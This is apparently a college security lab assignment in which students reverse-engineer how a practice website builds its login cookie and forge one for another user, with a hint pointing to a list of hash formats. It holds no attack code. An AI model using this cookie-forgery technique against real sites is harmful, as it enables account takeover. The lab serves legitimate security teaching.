Project X6: Reverse-Engineering an Authentication Cookie (15 pts. extra credit)

Purpose

Reverse-engineer an insecure logon process and hack in.

Observing the Target Website

Open a Web browser and visit this site:
http://attack.samsclass.info/cookielogin
Log in with a Name of root and a Password of toor, as shown below.

A Message Board opens, as shown below. Notice the "Welcome" message, showing that you are logged in.

Notice the "AUTH COOKIE" value--a long string of random-looking numbers and letters.

Log out and log in again with the other credentials--"admin" and "password". Examine the cookie.

Log in and out a few times to see what cookies you see.

Try to figure out how the cookie is constructed. When you get it, figure out the cookie for this account:

Username: fred
When you get in, you'll see the page below (with the grayed-out sections visible).

Hint

Look at this list of hash examples:

https://hashcat.net/wiki/doku.php?id=example_hashes

Saving the Screen Image

Save a FULL DESKTOP image with the filename Proj X6 from Your Name.

Turning in Your Project

Attach the image to cnit.123@gmail.com with a Subject line of Proj X6 from Your Name.

Last modified 10-8-14 4:56 pm
Hint updated 2-24-18